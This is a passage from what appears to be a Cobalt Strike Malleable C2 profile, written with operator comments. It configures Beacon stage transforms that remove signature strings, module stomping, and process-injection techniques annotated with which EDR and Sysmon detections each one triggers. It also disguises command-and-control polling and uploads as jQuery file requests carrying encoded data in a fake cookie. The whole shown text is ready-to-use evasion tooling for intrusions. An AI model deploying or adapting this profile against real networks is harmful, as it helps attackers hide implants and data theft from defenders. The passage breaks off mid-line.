356 set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
357
358 ## WARNING: Module stomping
359 # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
360 # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
361 # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
362 # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
363 # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4
364
365 # set module_x64 "netshell.dll";
366 # set module_x86 "netshell.dll";
367
368 # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
369 transform-x86 { # transform the x86 rDLL stage
370 prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
371 strrep "ReflectiveLoader" "execute"; # Change this text
372 strrep "This program cannot be run in DOS mode" ""; # Remove this text
373 strrep "beacon.dll" ""; # Remove this text
374 }
375 transform-x64 { # transform the x64 rDLL stage
376 prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
377 strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
378 strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
379 }
380
381 stringw "jQuery"; # Add this string to the DLL
382 }
383
384 ################################################
385 ## Process Injection
386 ################################################
387 ## Description:
388 ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior.
389 ## Values:
390 ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations.
391 ## min_alloc 4096 Minimum amount of memory to request for injected content.
392 ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW.
393 ## userwx false Use RWX as final permissions for injected content. Alternative is RX.
394 ##
395 ##
396 ## Use the transform-x86\x64 to pad content injected by Beacon
397 ## Use the execute block to control use of Beacon's process injection techniques
398 ## Guidelines:
399 ## - Modify the indicators to minimize in memory indicators
400 # - Refer to
401 ## https://www.cobaltstrike.com/help-malleable-c2#processinject
402 ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/
403
404 process-inject {
405
406 # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
407 set allocator "NtMapViewOfSection";
408
409 # Minimium memory allocation size when injecting content
410 set min_alloc "17500";
411
412 # Set memory permissions as permissions as initial=RWX, final=RX
413 set startrwx "false";
414 set userwx "false";
415
416 # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
417 transform-x86 {
418 prepend "\x90\x90";
419 #append "\x90\x90";
420 }
421
422 transform-x64 {
423 prepend "\x90\x90";
424 #append "\x90\x90";
425 }
426
427 ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
428 #
429 # Name x86->x64 x64-x86 Notes
430 #########################################################################
431 # CreateThread Current Process only
432 # CreateRemoteThread Yes No cross-session
433 # NtQueueApcThread
434 # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
435 # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
436 # SetThreadContext Yes Suspended processes (e.g. post-ex jobs only)
437 execute {
438
439 # The order is important! Each step will be attempted (if applicable) until successful
440 ## self-injection
441 CreateThread "ntdll!RtlUserThreadStart+0x42";
442 CreateThread;
443
444 ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)
445 # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
446 # SetThreadContext;
447 NtQueueApcThread-s;
448
449 ## Injection into existing processes
450 # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
451 #NtQueueApcThread;
452
453 # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries
454 # OPSEC - fires Sysmon Event 8
455 CreateRemoteThread;
456
457 # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
458 # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
459 RtlCreateUserThread;
460 }
461 }
462 ################################################
463 ## Maleable C2
464 ## https://www.cobaltstrike.com/help-malleable-c2#options
465 ################################################
466 ## HTTP Headers
467 ################################################
468 ## Description:
469 ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order.
470 ## Values:
471 ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end.
472 ## header "headername" "header alue The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored.
473 ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request.
474 ## Guidelines:
475 ## - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers
476
477 http-config {
478 set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
479 header "Server" "Apache";
480 header "Keep-Alive" "timeout=10, max=100";
481 header "Connection" "Keep-Alive";
482 # Use this option if your teamserver is behind a redirector
483 set trust_x_forwarded_for "true";
484 }
485
486 ################################################
487 ## HTTP GET
488 ################################################
489 ## Description:
490 ## GET is used to poll teamserver for tasks
491 ## Defaults:
492 ## uri "/activity"
493 ## Headers (Sample)
494 ## Accept: */*
495 ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
496 ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
497 ## Guidelines:
498 ## - Add customize HTTP headers to the HTTP traffic of your campaign
499 ## - Analyze sample HTTP traffic to use as a reference
500 ## - Multiple URIs can be added. Beacon will randomly pick from these.
501 ## - Use spaces as a URI seperator
502 http-get {
503
504 set uri "/jquery-3.3.1.min.js";
505 set verb "GET";
506
507 client {
508
509 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
510 #header "Host" "code.jquery.com";
511 header "Referer" "http://code.jquery.com/";
512 header "Accept-Encoding" "gzip, deflate";
513
514 metadata {
515 base64url;
516 prepend "__cfduid=";
517 header "Cookie";
518 }
519 }
520
521 server {
522
523 header "Server" "NetDNA-cache/2.2";
524 header "Cache-Control" "max-age=0, no-cache";
525 header "Pragma" "no-cache";
526 header "Connection" "keep-alive";
527 header "Content-Type" "application/javascript; charset=utf-8";
528
529 output {
530 mask;
531 base64url;
532 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
533 # 2nd Line
534 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
535 # 1st Line
536 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
537 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
538 print;
539 }
540 }
541 }
542
543 ################################################
544 ## HTTP POST
545 ################################################
546 ## Description:
547 ## POST is used to send output to the teamserver
548 ## Can use HTTP GET or POST to send data
549 ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
550 ## Defaults:
551 ## uri "/activity"
552 ## Headers (Sample)
553 ## Accept: */*
554 ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
555 ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
556 ## Guidelines:
557 ## - Decide if you want to use HTTP GET or HTTP POST requests for this section
558 ## - Add customize HTTP headers to the HTTP traffic of your campaign
559 ## - Analyze sample HTTP traffic to use as a reference
560 ## Use HTTP POST for http-post section
561 ## Uncomment this Section to activate
562 http-post {
563
564 set uri "/jquery-3.3.2.min.js";
565 set verb "POST";
566
567 client {
568
569 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
570 #header "Host" "code.jquery.com";
571 header "Referer" "http://code.jquery.com/";
572 header "Accept-Encoding" "gzip, deflate";
573
574 id {
575 mask;
576 base64url;
577 parameter "__cfduid";
578 }
579
580 output {
581 mask;
582 base64url;
583 print;
584 }
585 }
586
587 server {
588
589 header "Server" "NetDNA-cache/2.2";
590 header "Cache-Control" "max-age=0, no-cache";
591 header "Pragma" "no-cache";
592 header "Connection" "keep-alive";
593 header "Content-Type" "application/javascript; charset=utf-8";
594
595 output {
596 mask;
597 base64url;
598 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
599 # 2nd Line
600 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
601 # 1st Line
602 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
603 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
604 print;
605 }
606 }
607 }
608
609 ## Use HTTP GET for http-post section
610 ## Uncomment this Section to activate
611 # http-post {
612
613 # set uri "/jquery-3.3.2.min.js";
614 # set verb "GET";
615
616 # client {
617
618 # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
619 # #header "Host" "code.jquery.com";
620 # header "Referer" "http://code.jquery.com/";
621 # header "Accept-Encoding" "gzip, deflate";
622
623 # id {
624 # mask;
625 # base64url;
626 # parameter "__cfduid";
627 # }
628
629 # output {
630 # mask;
631 # base64url;
632 # parameter "__tg";
633 # }
634 # }
635
636 # server {
637
638 # header "Server" "NetDNA-cache/2.2";
639 # header "Cache-Control" "max-age=0, no-cache";
640 # header "Pragma" "no-cache";
641 # header "Connection" "keep-alive";
642 # header "Content-Type" "application/javascript; charset=utf-8";
643
644 # output {
645 # mask;
646 # base64url;
647 # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
648 # # 2nd Line
649 # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
650 # # 1st Line
651 # prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
652 # append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof 